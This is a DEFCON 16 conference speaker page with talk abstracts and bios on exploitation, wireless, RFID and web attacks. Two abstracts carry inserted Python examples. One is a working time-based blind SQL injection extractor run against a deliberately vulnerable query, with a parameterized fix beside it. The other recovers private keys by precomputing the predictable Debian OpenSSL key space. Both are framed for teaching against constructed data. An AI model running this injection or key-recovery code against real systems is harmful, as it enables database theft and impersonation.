Speakers

You can now download audio and video of all of the talks from DEFCON 16 from these RSS feeds:

DEFCON 16 Speaker & Slides (video)
DEFCON 16 Slides (video)
DEFCON 16 Audio


Speaker List


Alpha by speaker

BackTrack Foo - From bug to 0day


Mati Aharoni
Owner, Offensive Security

As pentesters and hackers we often find the need to create our exploits on the fly. Doing this always presents a challenge, but one challenge took us to a new limit and a new level, and we want to share the method with you. From Bug to 0Day will show the audience the process of fuzzing, locating the bug, using egghunters, and then working out how to build pure alphanumeric shellcode to exploit it.

This will truly be the most mind-bending 60 minutes you will spend in exploit development.

Mati is a network security professional, currently working with various military and government agencies as well as private sector businesses. His day-to-day work involves vulnerability research, exploit development and whitebox/blackbox penetration testing.

Mati is best known for his role in creating the award-winning, internationally acclaimed Linux pentesting distro BackTrack, and for his lead role in creating the hottest security training school in the international market today, "Offensive Security". This focused, intense school hones the skills of security professionals by teaching them the tools and methodologies popular in the market. Mati has been teaching security and hacking courses for over 10 years and is actively involved in the security arena.

Autoimmunity disorder in Wireless LAN


Md Sohail Ahmad
Senior Wireless Security Researcher, Airtight Networks Inc.
JVR Murthy
Senior Wireless Security Researcher, Airtight Networks Inc.
Amit Vartak
Senior Wireless Security Researcher, Airtight Networks Inc.

An autoimmune disorder is a condition that occurs when the immune system mistakenly attacks and destroys healthy body tissue. This presentation is about the discovery of an autoimmunity disorder in selected open source and commercial 802.11 AP implementations. By sending specially crafted packets, it is possible to trigger the autoimmunity disorder and cause the AP to turn hostile against its own clients. Eight examples of the autoimmune disorder will be demonstrated.

Autoimmunity disorder can be exploited to craft new DoS attacks. Although 802.11w promises immunity from DoS attacks, we show that autoimmunity disorder leaves a door open through which DoS attacks can still be launched. One example of a DoS attack against MFP (802.11w) will be demonstrated.

Md Sohail Ahmad is a wireless security researcher at AirTight Networks. Mr Ahmad possesses a strong background in secure driver development, protocol development, and open source tool development. He is currently working on mitigating various security aspects of the IEEE 802.11w and IEEE 802.11n standards and their implementations.

Prior to this, he demonstrated a more potent form of the Evil Twin attack, called "Multipot", at DEFCON 15. He also discovered the "Caffe Latte" attack, presented at ToorCon 9, which retrieves the WEP key from an isolated client in the absence of its authorized access point.

Time-Based Blind SQL Injection using heavy queries:


A practical approach for MS SQL Server, MS Access, Oracle and MySQL databases and Marathon Tool


Chema Alonso
Microsoft MVP Windows Security, Informática64
José Parada
Microsoft IT Pro Evangelist, Microsoft

This presentation describes how attackers can take advantage of SQL injection vulnerabilities using time-based blind SQL injection. The goal is to stress the importance of establishing secure development best practices for web applications, rather than entrusting site security to the perimeter defenses alone. The talk shows exploitation examples for some versions of the Microsoft SQL Server, Oracle DB Engine, MySQL and Microsoft Access database engines; nevertheless, the presented technique is applicable to any other database product on the market. This work also presents a new proof-of-concept tool.
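
The inference loop below is an added example, not code from the talk or from the Marathon Tool. It runs against an in-memory SQLite database constructed here; the table and column names, the secret, and the filler table are all assumptions. The heavy-query technique relies on the engine running the expensive subquery only when the injected condition holds; to force that ordering on SQLite the example wraps the heavy query in a CASE expression, and because SQLite has no catalog table to cross-join the way the talk does with MS SQL Server or Oracle, it cross-joins a filler table of its own. The HTTP response (here, the result set) is identical whether the guess is right or wrong, which is what makes the attack blind; only the elapsed time leaks the answer. The vulnerable query is concatenated on purpose; the parameterized lookup beside it is the secure development practice the abstract argues for.

```python
import sqlite3
import time

SECRET = "s3cr"  # constructed value the attacker wants to read out of the database


def build_db(heavy_rows=80):
    """Constructed target: a users table holding the secret, plus a filler table that
    a three-way cross join turns into a half-million-row 'heavy query'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pwd TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', ?)", (SECRET,))
    conn.execute("CREATE TABLE filler (n INTEGER)")
    conn.executemany("INSERT INTO filler VALUES (?)", [(i,) for i in range(heavy_rows)])
    conn.commit()
    return conn


def vulnerable_lookup(conn, user_id):
    """Vulnerable code: user input concatenated straight into the SQL text."""
    sql = "SELECT name FROM users WHERE id = " + user_id
    return conn.execute(sql).fetchall()


def safe_lookup(conn, user_id):
    """Hardened form: a bound parameter. The same payload is now just an id that matches nothing."""
    return conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchall()


# Cheap to type, expensive to run: count(*) over filler x filler x filler.
HEAVY = "(SELECT count(*) FROM filler a, filler b, filler c)"


def timed_probe(conn, condition):
    """Inject a CASE that runs the heavy query only when `condition` is true.
    '>= 0' always holds, so the returned rows never change; only the time does."""
    payload = "1 AND (CASE WHEN %s THEN %s ELSE 0 END) >= 0" % (condition, HEAVY)
    start = time.perf_counter()
    vulnerable_lookup(conn, payload)
    return time.perf_counter() - start


def calibrate(conn):
    """Time a known-false and a known-true probe, then put the decision threshold between them."""
    fast = timed_probe(conn, "1=2")
    slow = timed_probe(conn, "1=1")
    return fast + (slow - fast) / 3


def is_true(conn, condition, threshold):
    return timed_probe(conn, condition) > threshold


def extract_secret(conn, max_len=32):
    """Recover the secret one character at a time: first its length, then each
    code point by binary search (about seven timed requests per character)."""
    threshold = calibrate(conn)
    target = "(SELECT pwd FROM users WHERE id = 1)"
    length = 0
    while length < max_len and is_true(conn, "length(%s) > %d" % (target, length), threshold):
        length += 1
    secret = ""
    for pos in range(1, length + 1):
        lo, hi = 0, 127  # invariant: the character's code point lies in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if is_true(conn, "unicode(substr(%s, %d, 1)) > %d" % (target, pos, mid), threshold):
                lo = mid + 1
            else:
                hi = mid
        secret += chr(lo)
    return secret


if __name__ == "__main__":
    db = build_db()
    print("recovered:", extract_secret(db))
```

On a real target the same loop runs over HTTP, the threshold is calibrated against the network's own jitter, and the heavy query is whatever the engine offers (the talk's examples use catalog tables); the parameterized query removes the problem regardless of which engine sits behind the page.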

Chema Alonso is a Computer Engineer from Rey Juan Carlos University and a Systems Engineer from the Politécnica University of Madrid. He has been working as a security consultant for the last six years and has been awarded Microsoft Most Valuable Professional every year from 2005 to the present. He is a frequent Microsoft speaker at security conferences. He writes monthly in several Spanish technical magazines such as "Windows TI Magazine", "PC Actual" and "Hackin9". He is currently working on his PhD thesis under the direction of Dr. Antonio Guzmán and Dr. Marta Beltran. He recently spoke at BH Europe 2008 about LDAP Injection & Blind LDAP Injection attacks. More info: http://mvp.support.microsoft.com/gp/mvpInsider_2006-08

José Parada is an IT Pro Evangelist at Microsoft. He is a well-known speaker at Spanish conferences on IT infrastructure, Microsoft technologies and security. He has been working in the Microsoft TechNet program since 2005, delivering conferences, webcasts and technical information.

The Anatomy of a Subway Hack:


Breaking Crypto RFID's and Magstripes of Ticketing Systems


Zack Anderson
Student, MIT
RJ Ryan
Student, MIT
Alessandro Chiesa
Student, MIT

In this talk we go over weaknesses in common subway fare collection systems. We focus on the Boston T subway: we show how we reverse engineered the data on the magstripe card, we present several attacks that completely break the CharlieCard, a MIFARE Classic smartcard used in many subways around the world, and we discuss physical security problems. We will discuss practical brute force attacks using FPGAs and how to use software radio to read RFID cards. We survey 'human factors' that lead to weaknesses in the system, and we present a novel method of hacking WiFi: WARCARTING. We will release several open source tools we wrote in the process of researching these attacks. With live demos, we will demonstrate how we broke these systems.

Zack Anderson is studying electrical engineering and computer science at MIT. He is an avid hardware and software hacker, and has built several systems such as an autonomous vehicle for the DARPA Grand Challenge. Zack is especially interested in the security of embedded systems and wireless communications. He has experience building and breaking CDMA cellular systems and RFID. Zack has worked for a security/intelligence firm, and has multiple patents pending. He enjoys building systems as much as he enjoys breaking them.

RJ Ryan is a researcher at MIT. His longtime passion for security has resulted in a number of hacks and projects, including a steganographic cryptography protocol. RJ works on a number of technical projects ranging from computer security to operating systems, distributed computation, compilers, and computer graphics. He enjoys learning how things work, and how to make things work for him.

Alessandro Chiesa is a Junior at MIT double majoring in Theoretical Mathematics and in Electrical Engineering and Computer Science. Born and raised in Varese, Italy, he came to MIT with interests in computational algebraic geometry, machine learning, cryptography, and systems security. He has authored papers such as "Generalizing Regev's Cryptosystem", which proposes a new cryptosystem based on shortest vector problems in cyclotomic fields. He is currently working with Oracle's Database Security group.

Digital Security: a Risky Business


Ian O. Angell
Professor of Information Systems, London School of Economics

In this talk Professor Angell will take the devil’s advocate position, warning that computer technology is part of the problem as well as of the solution. The belief system at the core of computerization is positivist and/or statistical, and that itself leads to risk. The mixture of computers and human activity systems spawns bureaucracy and systemic risk, which can throw up singularities that defy any positivist/statistical analysis. Using black humour, Angell discusses the thin line between the utility of computers and the hazard of chaotic feedback, and ends with some advice on how to survive and prosper amongst all this complexity.

Ian Angell has been Professor of Information Systems at the London School of Economics since 1986. Prior to that he researched and taught Computer Science at Royal Holloway College, and University College London.

Angell has very radical and constructive views on his subject, and is very critical of what he calls the pseudo-science of academic Information Systems. He has gained a certain notoriety worldwide for his aggressive polemics against the inappropriate use of artificial intelligence and so-called knowledge management, and against the hyperbole surrounding e-commerce.

His main research work concentrates on organizational and national I.T. policies, on strategic information systems, and on computers and risk (both opportunities and hazards), particularly the systemic risks inherent in all socio-technical systems and the security threats posed to organisations by the rapidly diffusing international information infrastructure.

VulnCatcher: Fun with Vtrace and Programmatic Debugging



atlas

Countless hours are spent researching vulnerabilities in proprietary and open source software for each bug found. Many indicators of potential vulnerabilities are visible both in the disassembly and debugging, if you know what to look for. How much can be automated? VulnCatcher illustrates the power of programmatic debugging using the VTRACE libraries for cross-platform debugging.

atlas, a disciple of the illustrious Skodo, has a history in programming, systems support, telecom, security, and reverse engineering. His introduction to the hard-core hacking world was through dc13's CTF Qualifiers. Captain of two-time CTF winner "1@stplace" and individual winner of CTF-2005, atlas has released hacking tools and toolkits such as disass and atlasutils, and is co-maintainer of the Python library for x86 disassembly, libdisassemble.

Pen-Testing is Dead, Long Live the Pen Test


Taylor Banks
Security Evangelist
Carric
DEFCON Goon

This talk explores the death and subsequent re-birth of the penetration test. Comprised of conclusions drawn from the collective experiences of two seasoned pen-testers, our talk is filled with facts, fun and rhetoric. We will describe the landscape, the problems, and offer real solutions.

In our talk, we will explore the problems with modern-day pen-tests and pen-testers, and ways to stand out amongst the frauds selling their lackluster vuln-scan services under the guise of a true penetration test.

We discuss penetration tests that are overly tool-driven and/or lacking in methodology as well as pen-testers who lack the experience and creativity to identify the architectural problems that real attackers frequently exploit.

Along the way, we'll discuss the difficulties faced by real penetration testers and complement these with real-world war-stories to provide both context and comic relief.

Most importantly, we'll discuss how to solve these problems, through contributions to open methodologies, transparency in process, and shifts in technological paradigms. We'll tell you how to deal with the latest technologies, even those that change day-by-day. For those that take penetration testing seriously, this talk will be a fun, informative and enlightening presentation on the things we need to do to keep pen-testing worthwhile. Attendees will learn how to perform pentests accurately and obtain compelling and valuable results that ensure real return on investment for their clients.

Taylor Banks is a security evangelist and privacy pundit with over 15 years in the information technology industry, the last 10 focused exclusively on information security and privacy. Since 1998, he has been designing, implementing, teaching and managing secure information systems for Federal Government, US Military, private universities and public companies, from start-ups to Fortune 100. Taylor, aka "dr.kaos," is also the PoC for the Atlanta DEFCON Group (DC404), and in 2005 founded "kaos theory security research," creators of the Anonym.OS LiveCD. Between 1999 and 2002, Taylor worked at SecureIT (later acquired by VeriSign) providing CheckPoint, Nokia, NAI, Web Security and Applied Hacking training to hundreds of enterprise customers, as well as review, design and development of secure network architecture and related security policies for numerous Fortune 500 organizations. During that time, Mr. Banks devised testing methodologies and audit procedures, and helped found the VeriSign FIRE team to provide penetration tests and security audits for internal departments and enterprise customers. In 2003, Taylor trained the US Marine Corps 13-member Computer Emergency Response Team (MARCERT) to perform penetration tests and security audits to assess and improve the security of their own military and public networks. The MARCERT team subsequently entered DEFCON's prestigious CTF competition, ranking 3rd at the conclusion of the DEFCON XI conference. Since 2007, Taylor has been focused on virtualization and its impact on enterprise information security.

Carric is a Goon. Buy him beer.

Owning the Users with The Middler


Jay Beale
Senior Security Consultant and Co-Founder, Intelguardians Network Intelligence, Inc.

This talk introduces a new open source, plugin-extensible attack tool for exploiting web applications that use cleartext HTTP, if only to redirect the user to the HTTPS site. We'll demonstrate attacks on online banking as well as Gmail, LinkedIn, LiveJournal and Facebook. We'll also compromise computers and an iPhone by subverting their software installation and update process. We'll inject JavaScript into browser sessions and demonstrate CSRF attacks.

Our new tool, The Middler, automates these attacks to make exploiting every active user on your computer's network brain-dead easy and scalable. It has an interactive mode, but also has a fire-and-forget mode that can perform these attacks automatically without interaction. Written in Ruby, this tool is easy to both extend and add into other tools.

Jay Beale is an information security specialist, well known for his work on threat avoidance and mitigation technology. He's written two of the most popular security hardening tools: Bastille UNIX, a system lockdown and audit tool that introduced a vital security-training component, and the Center for Internet Security's Unix Scoring Tool. Both are used worldwide throughout private industry and government. Through Bastille and his work with the Center, Jay has provided leadership in the Linux system hardening space, participating in efforts to set, audit, and implement standards for Linux/Unix security within industry and government. Jay also contributed to the OVAL project and the Honeynet Project.

Jay has served as an invited speaker at a variety of conferences worldwide as well as government symposia. He's written for Information Security Magazine, SecurityFocus, and SecurityPortal. Jay has co-authored or edited nine books in the Information Security space. Six of these make up his Open Source Security Series, while two are technical works of fiction in the "Stealing the Network" series. Jay is a security analyst and managing partner at Intelguardians, where he gets to work with brilliant people on topics ranging from application penetration to virtual machine escape. Prior to this, Jay served as the Security Team Director for MandrakeSoft, helping set company strategy, design security products, and pushing security into the then third largest retail Linux distribution.

They're Hacking Our Clients! Introducing Free Client-side Intrusion Prevention


Jay Beale
Senior Security Consultant and Co-Founder, Intelguardians Network Intelligence, Inc.

In the face of far stronger firewall and IPS-protected perimeters, attackers are compromising far more systems by hacking our web browsers, e-mail clients, and office document tools. Unfortunately, vulnerability assessment practices still focus on checking listening services, even on workstations. Detecting vulnerable clients is left to patch management tools, which aren't in consistent or wide enough use. Even when organizations are able to invest the time and money in a patch management system, a series of critical problems keeps the botnet builders in business. This talk, by Bastille UNIX creator Jay Beale, introduces a free tool to detect vulnerable clients and keep them out of the botnets.

Jay Beale is an information security specialist, well known for his work on threat avoidance and mitigation technology. He's written two of the most popular security hardening tools: Bastille UNIX, a system lockdown and audit tool that introduced a vital security-training component, and the Center for Internet Security's Unix Scoring Tool. Both are used worldwide throughout private industry and government. Through Bastille and his work with the Center, Jay has provided leadership in the Linux system hardening space, participating in efforts to set, audit, and implement standards for Linux/Unix security within industry and government. Jay also contributed to the OVAL project and the Honeynet Project. Jay has served as an invited speaker at a variety of conferences worldwide as well as government symposia. He's written for Information Security Magazine, SecurityFocus, and SecurityPortal. Jay has co-authored or edited nine books in the Information Security space. Six of these make up his Open Source Security Series, while two are technical works of fiction in the "Stealing the Network" series.

Jay is a security analyst and managing partner at Intelguardians, where he gets to work with brilliant people on topics ranging from application penetration to virtual machine escape. Prior to this, Jay served as the Security Team Director for MandrakeSoft, helping set company strategy, design security products, and pushing security into the then third largest retail Linux distribution.

Predictable RNG in the vulnerable Debian OpenSSL package, the What and the How


Luciano Bello
Engineer (Information Systems), CITEFA/Si6
Maximiliano Bertacchini
Researcher, CITEFA/Si6

Recently, the Debian project announced a vulnerability in the OpenSSL package it had been distributing for the last two years. This bug makes the PRNG predictable, affecting the keys generated by openssl and by every other program that uses libssl (e.g. openssh, openvpn). We will talk about this bug, its discovery and publication, its consequences, and its exploitation. We will also demonstrate some exploitation tools.
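
What "predictable" cost in practice, as an added example (toy code written for this page, not the speakers' tools and not OpenSSL): after the Debian patch, the only entropy still reaching the PRNG was essentially the process id, which on a default Linux system has at most 32768 values, so every key the patched library ever generated belongs to a table an attacker can compute in seconds. The key derivation below is a hash stand-in for RSA key generation (not the real math; the "toy-prng" and "toy-pub" prefixes and the 4-byte seed encoding are assumptions); what it preserves is the property that matters, a deterministic map from seed to private key to public key. The strongly seeded pair beside it shows why the fixed library's keys are out of reach of the same table.

```python
import hashlib
import os

PID_MAX = 32768  # default Linux pid_max: the entire seed space once nothing else is mixed in


def toy_keypair(seed):
    """Toy stand-in for key generation (not RSA, not OpenSSL code): the private
    key is a deterministic function of the PRNG seed, the public key a
    deterministic function of the private key. That is all the attack needs."""
    priv = hashlib.sha256(b"toy-prng:" + seed).hexdigest()
    pub = hashlib.sha256(b"toy-pub:" + priv.encode()).hexdigest()
    return priv, pub


def weak_keypair(pid):
    """The broken case: the process id is the only input the PRNG still sees."""
    return toy_keypair(pid.to_bytes(4, "big"))


def strong_keypair():
    """The fixed case: 256 bits from the OS, far beyond any precomputed table."""
    return toy_keypair(os.urandom(32))


def build_weak_key_table():
    """Precompute the public key of every reachable seed (32767 entries).
    The blacklists shipped after the advisory were built the same way, one
    table per key type, size and architecture."""
    return {weak_keypair(pid)[1]: pid for pid in range(1, PID_MAX)}


def recover_private_key(public_key, table):
    """Given nothing but a public key, look up the seed that produced it and
    regenerate the private key; None means the key did not come from the
    predictable PRNG."""
    pid = table.get(public_key)
    return None if pid is None else weak_keypair(pid)[0]


if __name__ == "__main__":
    table = build_weak_key_table()
    victim_priv, victim_pub = weak_keypair(4242)  # a constructed victim key
    print("recovered == victim:", recover_private_key(victim_pub, table) == victim_priv)
    print("strong key in table:", recover_private_key(strong_keypair()[1], table) is not None)
```

The same lookup is what makes the weak keys exploitable without any cryptanalysis: an SSH server key, a client key in authorized_keys, or an X.509 certificate generated on an affected host can be matched against the table and its private half regenerated on the spot.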

Luciano Bello is an Engineer (Information Systems) and works as a researcher at CITEFA's Si6 Information Security Labs in Buenos Aires, Argentina. He has been a Debian Developer since 2007.

Maximiliano Bertacchini is a PhD student in Computer Engineering at ITBA (Technological Institute of Buenos Aires). He is a researcher at CITEFA's Si6 Information Security Labs in Buenos Aires, Argentina.

When Lawyers Attack! Dealing with the New Rules of Electronic Discovery


John Benson "jur1st"
Electronic Discovery Consultant

The legal community is slowly accepting that the changes to the Federal rules which change the law's approach to electronic evidence are not going away. Vendors are clamoring to sell their e-discovery "solutions" to law firms and corporations alike, often taking advantage of the uncertainty that comes with such sweeping changes to the law.

The changes to the Federal Rules change the way in which individuals and organizations approach their data much in the same way Sarbanes-Oxley has over the past few years. Instead of merely creating compliance headaches for security professionals, however, these changes take data security out of the hands of those charged to protect it and spread data to the wind.

More frightening for individuals doing security research is the fact that these rules apply to the one-man research operation in the same way as to the multimillion-dollar conglomerate.

This talk outlines how the electronic discovery process works, why it is costing corporations millions of dollars (but doesn't have to) and will empower attendees with the knowledge they need to deal with this new legal environment.

John Benson currently works as an electronic discovery consultant at a large Kansas City law firm. A graduate of the University of Missouri from both Columbia and Kansas City campuses, he is a member of the Missouri Bar Association and serves as the chairman of the Kansas City Metropolitan Bar Association Computer Law and Technology Committee. He has taught law, ethics and (oddly enough) finance as an adjunct professor at The Colorado Technical University. In 2008 he founded the Cowtown Computer Congress, a hackerspace and umbrella organization for the advancement of user-driven technology activities in Kansas City. He has presented at hacker cons around the country including LayerOne, Pumpcon, Shmoocon and DEFCON. He can be found on the DEFCON boards and assisting with radio communications at DEFCON. His website can be found at http://www.john-benson.com.

The emergence (and use) of Open Source Warfare


Peter Berghammer
CEO, Copernio Holding Company

The presentation will deal briefly (20 minutes) with the concepts surrounding Open Source Warfare (OSW) and its broader adoption, not only in the context of warfighting but also in the political arena, in order to influence opinion.

The presentation will only deal with publicly available data, coupled with real world deployment examples. It WILL NOT contain any type of classified data or anything that can be construed as such.

OSW has become a highly lucrative area that covers topics such as computer security, shaping of potential battlefields and populations, and actual in-the-field uses of modified electronic devices such as microwave ovens, model rockets and remote controlled aircraft, as well as computer based command and control protocols. What is so particularly interesting in this presentation (as well as the field itself) is how underfunded and ill-equipped insurgency (and counter-insurgency) groups can make use of off-the-shelf technology to fight against vastly better funded armies. It will also examine the communications methods of these groups, how they approach not only Internet-style communication (and in some cases set up their own superior communications networks) but also how they approach communications security.

Peter Berghammer, CEO of Copernio (founded 2001), is an accomplished aerospace, semiconductor and optical disc industry professional. Though best known for his marketing acumen, he also possesses a thorough understanding and appreciation for strategic alliances, acquisitions, and mergers. He is noted for the rapid expansion of The Copernio Holding Company, taking it from simply an IT solutions provider to an organization with divisions handling consulting, research, warehousing & logistics. Under his tenure, Copernio has expanded from a single location to an international corporation with warehouses and offices in over eighteen countries. His goal however has always remained the same: to help clients achieve their business objectives through the intelligent and efficient use of information technology and infrastructure. The Copernio Holding Company is headquartered in Huntington Beach, CA and Brussels, BE.

What To Do When Your Data Winds Up Where It Shouldn't


Don Blumenthal
DMB & Associates

Stories about the loss of sensitive data are becoming more common, and an untold number of others probably are not known because they were not covered by law or did not get the attention of regulators. A loss may happen when data is stolen or simply lost, or when a system is breached. Existing federal and state laws cover specific industries and prescribe particular responses, but pending legislative proposals threaten to expand coverage significantly. This presentation will discuss the relevant federal and state laws concerning disclosure of sensitive information. In addition, it will explore the elements of a plan for responding to a data loss and the considerations that occur should that plan have to be put into use. These plans, elements, and considerations are critical for addressing a data loss and for dealing with such disparate groups as regulators, the public, employees, and shareholders after your, and their, data is gone.

Don Blumenthal is a professional with over 20 years of proven experience in technology, law, and policy, and has worked on data breach matters from both the law enforcement and private sector sides. He is a consultant and attorney based in Ann Arbor, MI, specializing in data security and privacy issues, as well as other technology-related matters such as electronic discovery, spam, malware, and Internet evidence development. He also is a Senior Principal with Global Cyber Risk, LLC, of Washington, DC. In addition, Mr. Blumenthal is an adjunct professor in the University of Michigan School of Information and serves as a legal affairs SME for the Centre for Assurance Studies, an NSA Center of Academic Excellence in Information Assurance Education at the University of Detroit Mercy.

Working with Law Enforcement


Don M. Blumenthal
DMB & Associates

Security-related laws and regulations, with parallel privacy measures, are assuming an ever-expanding role in American society. As a result, the likelihood that an organization will receive a call, visit, subpoena, or letter from a law enforcement agency is constantly increasing. This program will address issues related to handling these contacts. It will explore relevant legal questions but also the real world processes and considerations that should go into protecting private sector interests, and even lessening the burden of government inquiries. In addition, it will discuss considerations concerning the proactive fostering of relationships with law enforcement, to mutual benefit.

Don M. Blumenthal is a professional with over 20 years of proven experience in technology, law, and policy. He is a consultant and attorney based in Ann Arbor, MI, specializing in data security and privacy issues, as well as other technology-related matters such as electronic discovery, spam, malware, and Internet evidence development. He also is a Senior Principal with Global Cyber Risk, LLC, of Washington, DC. In addition, Mr. Blumenthal is an adjunct professor in the University of Michigan School of Information and serves as a legal affairs SME for the Centre for Assurance Studies, an NSA Center of Academic Excellence in Information Assurance Education at the University of Detroit Mercy.

Generic, Decentralized, Unstoppable Anonymity: The Phantom Protocol


Magnus Bråding
Security Researcher, Fortego Security

Recent years, and especially this past year, have seen a notable upswing in developments against online privacy around the world, primarily in the form of draconian surveillance and censorship laws (both passed and attempted) and ISPs being pressured into individually acting as both police and informants for commercial interests. Once such first steps are taken, it's of course also of huge concern how these newly created possibilities could be used outside of their originally stated bounds, and what the future of such developments may be.

There are no signs of this trend being broken anytime soon, and combined with the ever growing online migration of everything in general, and privacy sensitive activities in particular (such as voting and all kinds of discussions and other personal groupings), this will in turn unavoidably lead to a huge demand for online anonymization tools and similar privacy means.

If not designed carefully though, such anonymization tools will yet again be easy targets for additional draconian legislation and directed (il)legal pressure from big commercial interests. Thus, a good, robust and theoretically secure design for an anonymization protocol and infrastructure is needed, which is exactly what is set out to be done with this project.

What is presented in this talk is the design of a protocol and complete system for anonymization, intended as a candidate for a free, open, community owned, de facto anonymization standard, vastly improving on existing solutions such as TOR, and having the following important main properties and design goals:

  1. Completely decentralized.
    - No critical or weak points to attack or put (il)legal pressure on.

  2. Maximum resistance against all kinds of DoS attacks.
    - Direct technical destructive attacks will practically be the only possible way to even attempt to stop it.

  3. Theoretically secure anonymization.
    - Probabilistic methods (contrary to deterministic methods) must be used in a completely decentralized design like this, where no other peer can be trusted, so focus is put on optimizing these methods.

  4. Theoretically secure end-to-end transport encryption.
    - This is simple in itself, but still important in the context of anonymization.

  5. Completely (virtually) isolated from the "normal" Internet.
    - No one should have to worry about crimes being perpetrated from their own IP address.

  6. Maximum protection against identification of protocol usage through traffic analysis.
    - You never know what the next draconian law might be.

  7. Capable of handling larger data volumes, with acceptable throughput.
    - Most existing anonymization solutions are practically unusable for (or even prohibit) larger data volumes.

  8. Generic and well-abstracted design, compatible with all new and existing network enabled software.
    - Software application developer participation should not be needed, it should be easy to apply the anonymization to both new and already existing products like e.g. web browsers and file transfer software.

The Phantom protocol has been designed to meet all these requirements, and will be presented in this talk.

Magnus Bråding is a security researcher at (and co-founder of) Swedish IT security specialist firm Fortego Security.

His life-long passion for reversing, understanding and ultimately controlling any and all aspects and processes around him has resulted in, among other things, a solid security background with more than 15 years worth of experience within the fields of reverse engineering and network security and forensics. He is also a central contributor, maintainer and driving force behind one of the world's most long-running and well-known online reverse engineering resources.

Buying Time - What is your Data Worth?


(A generalized Solution to distributed Brute Force attacks)


Adam Bregenzer
Security Researcher

Brute force attacks are often marginalized as a user issue or discounted as a non-issue because of sufficient password complexity. Because rainbow tables have reinvigorated this type of attack, maintaining password complexity is simply not enough. In this session, I will be releasing a framework for easily creating a brute force attack tool that is both multithreaded and distributed across multiple machines. As computing power continues to grow along with the ability to rent cycles and storage space, it becomes reasonable to add a money-time trade-off to brute force and dictionary attacks. Distributed computing combined with rainbow tables means brute force attacks can now be very effective. I will present a version of a popular brute force tool which I modified to increase its speed by several orders of magnitude. Additionally I will demonstrate how to adapt an existing tool to utilize this framework.

Adam Bregenzer is actively involved in technology research and development. As a charter member of the kaos.theory computer security consortium, he developed and presented various projects to the Information Security industry at a number of national conventions. He was a contributing author to the O'Reilly Series of programming manuals. He developed a number of nationally recognized websites and projects receiving worldwide press from Wired News, the New York Times, The Register, the Boston Globe, and the LA Times.


ModScan: A SCADA MODBUS Network Scanner


Mark Bristow
Security Researcher

ModScan is a new tool designed to map a SCADA MODBUS TCP based network. The tool is written in Python for portability and can be used on virtually any system with few required libraries. The presentation includes a demonstration of the ModScan scanner as well as a rundown of the various features and modes available. I will also be covering the MODBUS and MODBUS TCP protocols, including packet construction and communication flows. A brief SCADA primer is also included for the education of the audience.

Mark is a Certified SCADA Security Architect with three years' experience in the information assurance business. He has done research and analysis of the SCADA MODBUS and MODBUS TCP protocols, leading to the development of his ModScan tool. In addition to his SCADA work, Mark is a Web Application Security penetration tester and consultant. He regularly speaks at local events in DC and VA and frequently conducts training on the subject. Mark received his bachelor's degree in Computer Engineering from The Pennsylvania State University.


Deciphering Captcha


Michael Brooks
Security Engineer, Fruition Security

This presentation will detail two methods of breaking captcha. One uses RainbowCrack to break a visual captcha. The other uses fuzzy logic to break an audio captcha. Both methods are 100% effective. These are real attacks that affect real world software: CVE-2008-2020 and CVE-2008-2019. Exploit code is available to the public.

Michael Brooks is a puzzle master. Some people like Sudoku, but Michael likes hacking. Michael is a Computer Science student at Northern Arizona University. Michael has worked in web application development and penetration testing, as well as other forms of software quality control. Currently he works in the financial industry for https://www.paythentrade.com/ as a security engineer. Michael has recently started the website http://www.rooksecurity.com/ . As you can see, Michael has published a wide range of real world attacks against web applications.

Exploit code written by Michael:
http://milw0rm.com/author/677

CVEs from Michael:
CVE-2008-2019, CVE-2008-2020, CVE-2008-2043, CVE-2007-6471, CVE-2007-6459, CVE-2007-6458, CVE-2007-0134, CVE-2007-0132,
CVE-2007-0130, CVE-2006-6781, CVE-2006-3208, CVE-2006-3207, CVE-2006-3206, CVE-2006-3205, CVE-2006-3204, CVE-2006-3203.


CSRF Bouncing†


Michael Brooks
Security Engineer, Fruition Security

In this talk I will be discussing Exploit Chaining in Web Applications and CSRF. I will discuss the surface area problem in security and how to gain access to a larger attack surface using CSRF. I will detail the process I used to find and exploit a vulnerability in a real world application. I will discuss how to have fun in a sandbox and how to defeat CSRF protection. I will also talk about the defenses against these attacks. I will be releasing a 0-day exploit and provide a machine for the audience to break into.

Michael Brooks is a security researcher engaged in exploit development. Michael is interested in real world attacks as well as new methods of exploitation. He enjoys finding flaws in applications and writing exploit code. http://milw0rm.com/author/677

CVEs from Michael:
CVE-2008-2019, CVE-2008-2020, CVE-2008-2043, CVE-2007-6471, CVE-2007-6459, CVE-2007-6458, CVE-2007-0134, CVE-2007-0132,
CVE-2007-0130, CVE-2006-6781, CVE-2006-3208, CVE-2006-3207, CVE-2006-3206, CVE-2006-3205, CVE-2006-3204, CVE-2006-3203.

Michael is a computer science student at Northern Arizona University. Michael has successfully worked in penetration testing as well as software quality control. Currently he works for http://fruitionsecurity.com/ as a security engineer and recently started the website http://www.rooksecurity.com/


Bypassing pre-boot authentication passwords by instrumenting the BIOS keyboard buffer (practical low level attacks against x86 pre-boot authentication software)


Jonathan Brossard
Lead Security Researcher, Iviz

Pre-boot authentication software, in particular full hard disk encryption software, plays a key role in preventing information theft. In this paper, we present a new class of vulnerability affecting multiple high value pre-boot authentication software products, including the latest Microsoft disk encryption technology: Microsoft Vista's BitLocker, with TPM chip enabled. Because pre-boot authentication software programmers commonly make wrong assumptions about the inner workings of the BIOS interrupts responsible for handling keyboard input, they typically use the BIOS API without flushing or initializing the BIOS internal keyboard buffer. Therefore, any user input, including plain text passwords, remains in memory at a given physical location. In this article, we first present a detailed analysis of this new class of vulnerability and generic exploits for Windows and Unix platforms under x86 architectures. Unlike current academic research aiming at extracting information from the RAM, our practical methodology does not require any physical access to the computer to extract plain text passwords from the physical memory. In a second part, we will present how this information leakage, combined with usage of the BIOS API without careful initialization of the BIOS keyboard buffer, can lead to computer reboot without console access and full security bypass of the pre-boot authentication PIN if an attacker has enough privileges to modify the bootloader. Other related work includes information leakage from CPU caches, reading physical memory via FireWire, and switching CPU modes.

Jonathan Brossard is French, and has recently moved to India to build and lead the research and exploitation team of Iviz (http://www.ivizindia.com/iviz/aboutus.html). Jonathan's daily activities involve exploit writing, reverse engineering, code auditing and research in disruptive low level hacking methodologies.

